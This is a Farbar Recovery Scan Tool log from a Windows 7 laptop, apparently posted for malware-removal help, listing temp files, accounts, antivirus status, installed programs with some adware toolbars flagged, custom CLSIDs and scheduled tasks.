2015-12-16 18:27 - 2014-08-05 20:26 - 00000000 ____D C:\Program Files (x86)\McAfee
2015-12-16 18:24 - 2014-11-03 13:42 - 00002183 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-12-15 21:54 - 2014-10-27 21:48 - 00000000 ____D C:\Users\Charlie\Documents\BCHS
2015-12-13 08:14 - 2014-10-18 16:29 - 00000000 ____D C:\Users\Charlie\AppData\Local\Hewlett-Packard
==================== Files in the root of some directories =======
2014-11-16 23:26 - 2015-12-20 12:06 - 0003946 _____ () C:\Users\Charlie\AppData\Roaming\evpro32.prf
2014-10-18 19:36 - 2014-10-18 19:36 - 0000057 _____ () C:\ProgramData\Ament.ini
Some files in TEMP:
====================
C:\Users\Charlie\AppData\Local\Temp\COMAP.EXE
C:\Users\Charlie\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmptas2yv.dll
C:\Users\Charlie\AppData\Local\Temp\Extract.exe
C:\Users\Charlie\AppData\Local\Temp\GURE7C7.exe
C:\Users\Charlie\AppData\Local\Temp\HPInstaller.exe
C:\Users\Charlie\AppData\Local\Temp\HPSFUpdater.exe
C:\Users\Charlie\AppData\Local\Temp\jre-8u45-windows-au.exe
C:\Users\Charlie\AppData\Local\Temp\jre-8u60-windows-au.exe
C:\Users\Charlie\AppData\Local\Temp\jre-8u65-windows-au.exe
C:\Users\Charlie\AppData\Local\Temp\jre-8u66-windows-au.exe
C:\Users\Charlie\AppData\Local\Temp\McCSPInstall.dll
C:\Users\Charlie\AppData\Local\Temp\mccspuninstall.exe
C:\Users\Charlie\AppData\Local\Temp\OfficeSetup.exe
C:\Users\Charlie\AppData\Local\Temp\SMARTProductUpdate.exe
C:\Users\Charlie\AppData\Local\Temp\SP67266.exe
C:\Users\Charlie\AppData\Local\Temp\SP67743.exe
C:\Users\Charlie\AppData\Local\Temp\SP68630.exe
C:\Users\Charlie\AppData\Local\Temp\SP70271.exe
C:\Users\Charlie\AppData\Local\Temp\UninstallHPSA.exe
C:\Users\Charlie\AppData\Local\Temp\{3C54AF03-11C0-41B9-91DC-5F5B17899C60}-41.0.2272.118_41.0.2272.101_chrome_updater.exe
==================== Bamital & volsnap =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2016-01-09 01:47
==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version:09-01-2015
Ran by Charlie (2016-01-10 12:44:00)
Running from C:\Users\Charlie\Downloads
Windows 7 Professional Service Pack 1 (X64) (2014-10-18 21:26:59)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-1024156207-2972793060-2867319265-500 - Administrator - Disabled)
Charlie (S-1-5-21-1024156207-2972793060-2867319265-1000 - Administrator - Enabled) => C:\Users\Charlie
Guest (S-1-5-21-1024156207-2972793060-2867319265-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1024156207-2972793060-2867319265-1002 - Limited - Enabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Out of date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Out of date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}
FW: McAfee Firewall (Enabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe Acrobat 5.0 (HKLM-x32\...\Adobe Acrobat 5.0) (Version: - )
Adobe Acrobat X Pro (HKLM-x32\...\{AC76BA86-1033-0000-7760-000000000005}) (Version: 10.1.16 - Adobe Systems)
Adobe Digital Editions 4.0 (HKLM-x32\...\Adobe Digital Editions 4.0) (Version: 4.0.3 - Adobe Systems Incorporated)
Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.270 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.267 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.10) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.10 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.4.144 - Adobe Systems, Inc.)
ANT Drivers Installer x64 (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden
Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Bejeweled 3 (x32 Version: 2.2.0.97 - WildTangent) Hidden
Blackhawk Striker 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
CameraHelperMsi (x32 Version: 13.31.1038.0 - Logitech) Hidden
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Cradle of Rome 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.7.4016 - CyberLink Corp.)
CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.4.4102 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 5.0.4.4113 - CyberLink Corp.)
Dora's World Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
Dropbox (HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Dropbox) (Version: 3.12.5 - Dropbox, Inc.)
Elevated Installer (x32 Version: 3.2.29.0 - Garmin Ltd or its subsidiaries) Hidden
Energy Star (HKLM-x32\...\{FC0ADA4D-8FA5-4452-8AFF-F0A0BAC97EF7}) (Version: 1.0.9 - Hewlett-Packard Company)
erLT (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden
ESU for Microsoft Windows 7 SP1 (HKLM-x32\...\{E1ACF120-CD69-47F0-B202-9A4B95C436D8}) (Version: 5.1.5 - Hewlett-Packard)
ExamView ActiveX Control v2 (HKLM-x32\...\ExamView ActiveX Control v2) (Version: - )
ExamView Assessment Suite (HKLM-x32\...\ExamView Pro) (Version: - )
Farm Frenzy (x32 Version: 2.2.0.98 - WildTangent) Hidden
Farmscapes (x32 Version: 2.2.0.98 - WildTangent) Hidden
Final Drive Fury (x32 Version: 2.2.0.95 - WildTangent) Hidden
FromDocToPDF Internet Explorer Toolbar (HKLM-x32\...\FromDocToPDF_65bar Uninstall Internet Explorer) (Version: - Mindspark Interactive Network) <==== ATTENTION
Fusion Browser 1.265.1 (HKLM\...\{84A45CC4-5BE9-4EA9-9AD5-EEEC9F534F0D}_is1) (Version: 1.265.1 - Fusion Media)
Garmin Express (HKLM-x32\...\{714dc1e5-69a4-4ecd-9552-93397e084298}) (Version: 3.2.29.0 - Garmin Ltd or its subsidiaries)
Garmin Express (x32 Version: 3.2.29.0 - Garmin Ltd or its subsidiaries) Hidden
Garmin Express Tray (x32 Version: 3.2.29.0 - Garmin Ltd or its subsidiaries) Hidden
GCPlugin2 (HKLM-x32\...\{30420F05-0E15-4A3B-AE73-9E39ABA6CF5E}) (Version: 2.0.2.10 - GradeCam)
Get-a-Clip (HKLM-x32\...\Get-a-Clip) (Version: - Get-a-Clip)
Google Advertising Cookie Opt-out (HKLM\...\{A2E00B38-848D-4898-9109-BFA37C074DDC}) (Version: 1.0.1.0 - Google Inc)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
GradeCam Plugin x64 (HKLM\...\{EEA6A66F-FC11-436C-B01B-9D2EC1D62CA5}) (Version: 2.0.2.10 - GradeCam Corporation)
GradeCam Plugin x86 (HKLM-x32\...\{D776F9D4-581E-4BF2-880F-E4E6ACD2A002}) (Version: 2.0.2.10 - GradeCam Corporation)
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
Hoyle Card Games (x32 Version: 2.2.0.95 - WildTangent) Hidden
HP 3D DriveGuard (HKLM-x32\...\{13133E99-B0D5-4143-B832-AAD55C62A41C}) (Version: 6.0.19.1 - Hewlett-Packard Company)
HP CoolSense (HKLM-x32\...\{ADE2F6A7-E7BD-4955-BD66-30903B223DDF}) (Version: 2.20.41 - Hewlett-Packard Company)
HP Documentation (HKLM-x32\...\{9AB1B6EC-AEA4-4D78-ADDB-0291BF7230F4}) (Version: 1.1.0.0 - Hewlett-Packard)
HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.2.5 - WildTangent)
HP Officejet Pro 8600 Basic Device Software (HKLM\...\{791A06E2-340F-43B0-8FAB-62D151339362}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
HP Officejet Pro 8600 Help (HKLM-x32\...\{46235FF7-2CBE-4A84-BEDA-87348D1F7850}) (Version: 28.0.0 - Hewlett Packard)
HP On Screen Display (HKLM-x32\...\{ED1BD69A-07E3-418C-91F1-D856582581BF}) (Version: 1.3.5 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{6BA7C52E-4071-47CC-9060-ABB143862DB0}) (Version: 3.0.7 - Hewlett-Packard Company)
HP Setup (HKLM-x32\...\{438363A8-F486-4C37-834C-4955773CB3D3}) (Version: 9.1.15430.4033 - Hewlett-Packard Company)
HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.01.11 - Hewlett-Packard)
HP Software Framework (HKLM-x32\...\{DB97D0DE-0AA1-413C-8398-92C7FA3F4A67}) (Version: 4.6.13.1 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{79C54A05-F146-4EA0-8A70-D4EFE6181E52}) (Version: 8.1.40.3 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{55065080-504F-43BB-BE00-36B80D7D39A5}) (Version: 12.0.30.219 - Hewlett-Packard Company)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
Inst5675 (Version: 8.01.11 - Softex Inc.) Hidden
Inst5676 (Version: 8.01.11 - Softex Inc.) Hidden
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3621 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.9.1000 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.4.40 - Intel Corporation)
Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
Java 8 Update 65 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218065F0}) (Version: 8.0.650.17 - Oracle Corporation)
Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Jewel Quest Mysteries: The Seventh Gate Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
John Deere Drive Green (x32 Version: 2.2.0.95 - WildTangent) Hidden
LessonView (HKLM-x32\...\LessonView) (Version: - )
Logitech Webcam Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.0 - Logitech Inc.)
Luxor HD (x32 Version: 2.2.0.98 - WildTangent) Hidden
LWS VideoEffects (Version: 13.30.1379.0 - Logitech) Hidden
Mah Jong Medley (x32 Version: 2.2.0.95 - WildTangent) Hidden
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.207 - McAfee, Inc.)
McAfee® Total Protection (HKLM-x32\...\MSC) (Version: 14.0.6136 - McAfee, Inc.)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 15.0.4779.1002 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41105.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
MSN (HKLM-x32\...\MSNINST) (Version: 11.50.0766.0 - Microsoft Corporation)
MSN Explorer Repair Tool (HKLM-x32\...\{3D36105D-D6C2-413A-9355-7370E8D9125B}) (Version: 11.50.0766.0 - Microsoft Corporation)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4779.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4779.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4779.1002 - Microsoft Corporation) Hidden
One System Care (HKLM-x32\...\OneSystemCare) (Version: 2.10.10.0 - OneSystemCare) <==== ATTENTION
opensource (x32 Version: 1.0.14960.3876 - Your Company Name) Hidden
Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden
Poker Superstars III (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden
Prentice Hall Physical Science Interactive Textbook CD-ROM (HKLM-x32\...\{DFBEBE31-6C56-4B5F-88C2-FF827AFFDBC5}) (Version: 1.00.0000 - Prentice Hall)
Presenter version 3.0.4.5 (HKLM-x32\...\{73E8CFA8-F031-40B1-9129-C1247D178DCD}_is1) (Version: 3.0.4.5 - IPEVO Inc.)
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.312 - Qualcomm Atheros Communications)
Qualcomm Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 10.0 - Qualcomm Atheros)
QuickTime 7 (HKLM-x32\...\{80CEEB1E-0A6C-45B9-A312-37A1D25FDEBC}) (Version: 7.78.80.95 - Apple Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.273.49 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.85.423.2014 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7231 - Realtek Semiconductor Corp.)
RollerCoaster Tycoon 3: Platinum (x32 Version: 2.2.0.98 - WildTangent) Hidden
ShopAtHome.com Helper (HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\ShopAtHome.com Helper) (Version: 7.10.6.17 - ShopAtHome.com) <==== ATTENTION
ShopAtHome.com Toolbar (HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\ShopAtHome.com Toolbar) (Version: 7.10.6.17 - ShopAtHome.com) <==== ATTENTION
SMART Common Files (HKLM-x32\...\{26A95DBF-A866-4838-A8C9-FA219FCBD22E}) (Version: 11.5.159.0 - SMART Technologies ULC)
SMART Ink (HKLM-x32\...\{5ABC49B5-D0DC-428D-A082-4AEFF6490F04}) (Version: 2.0.723.0 - SMART Technologies ULC)
SMART Notebook (HKLM-x32\...\{79660EE7-9C0B-4962-B566-2693FE34719D}) (Version: 11.4.564.0 - SMART Technologies ULC)
SMART Product Drivers (HKLM-x32\...\{53330A17-78DE-458E-9997-292A2D6D3ADD}) (Version: 11.4.872.1 - SMART Technologies ULC)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 18.1.7.16 - Synaptics Incorporated)
TeacherEXPRESS: Prentice Hall Physical Science (HKLM-x32\...\TeacherEXPRESS: Prentice Hall Physical Science) (Version: - )
Torchlight (x32 Version: 2.2.0.98 - WildTangent) Hidden
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
Validity WBF DDK (HKLM\...\{21498212-1146-4540-8A81-6A1328BA19F2}) (Version: 4.5.228.0 - Validity Sensors, Inc.)
Virtual Villagers 4 - The Tree of Life (x32 Version: 2.2.0.98 - WildTangent) Hidden
Web Companion (HKLM-x32\...\{2db81dda-4a3a-409a-95ee-35f5f1366180}) (Version: 2.1.1265.2535 - Lavasoft)
Web Updater version 1.0.24.0 (HKLM\...\{E440E2C7-6EA3-46E1-8991-FB53C40AEF5F}_is1) (Version: 1.0.24.0 - Web Updater)
WildTangent Games App (HP Games) (x32 Version: 4.0.5.36 - WildTangent) Hidden
Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{C6BDB9CB-5921-5A0D-ACED-D5F0EBCD92A1}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\GradeCam Corporation\GCPlugin64\npGCPlugin64_2.0.2.10.dll (GradeCam Corporation)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {00532042-E325-4B5F-9A4B-C4BE2719C675} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2015-10-30] (Microsoft Corporation)
Task: {093A13B7-EA87-43B1-9C8E-E79B05EF77EA} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {0C2051A4-532A-4C92-B62F-81876D901712} - System32\Tasks\Fusion Browser Update Task => Chrome.exe --sch-update
Task: {0DDEEAEA-10BF-4F5E-8430-AB9E61545ABE} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [2015-11-03] (McAfee, Inc.)
Task: {1112A124-C075-4683-90F5-18FF6FDA9D4C} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1024156207-2972793060-2867319265-1000UA => C:\Users\Charlie\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-30] (Dropbox, Inc.)
Task: {15065424-9F51-4275-88A4-4E8B13E41D9D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {1694DD14-237E-4852-B696-048B86CC5641} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2015-10-30] (Microsoft Corporation)
Task: {2375DDF3-B77A-4ED8-B269-3EFBDE46F0D9} - System32\Tasks\HP AR Program Upload - bc22bb12ee95412ea8674f2ec7d9856afd78dd59bb164814bed5e8212d68ac07 => C:\Program Files\HP\HP Officejet Pro 8600\bin\HPRewards.exe [2012-10-17] (TODO: <Company name>)
Task: {2B43043C-FEC8-40FD-997D-4CCC366C2781} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-10-28] (Adobe Systems Incorporated)
Task: {2E9B0267-4BC2-4E0C-997E-CA602F06789B} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [2015-11-02] (McAfee, Inc.)
Task: {32BE05F2-95B0-4DB3-8FCB-70C777ECE174} - System32\Tasks\{9087FBD2-BE5A-4959-8427-E5A514D8FA8E} => pcalua.exe -a E:\Setup.exe -d E:\
Task: {33D0099D-EAA9-4CDF-B993-1E3E5B41D793} - System32\Tasks\Hewlett-Packard\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [2014-05-19] (Hewlett-Packard Development Company, L.P.)
Task: {40351BE5-BC97-494F-8470-20E8181B404D} - System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\21.0\mcdatrep.exe [2015-08-04] (McAfee, Inc.)
Task: {43723026-9A3C-435B-9B1E-F9B16F6CB5F3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {47D87ACF-3A35-4E76-B65F-873DECC2E064} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {4994821B-ED79-4D33-A90A-6EF9B1870A82} - System32\Tasks\YCMServiceAgent => C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe [2014-05-13] (CyberLink Corp.)
Task: {4CB0D980-A0AF-4ED7-994D-B8E7B27A5419} - System32\Tasks\McAfee\McAfee Idle Detection Task
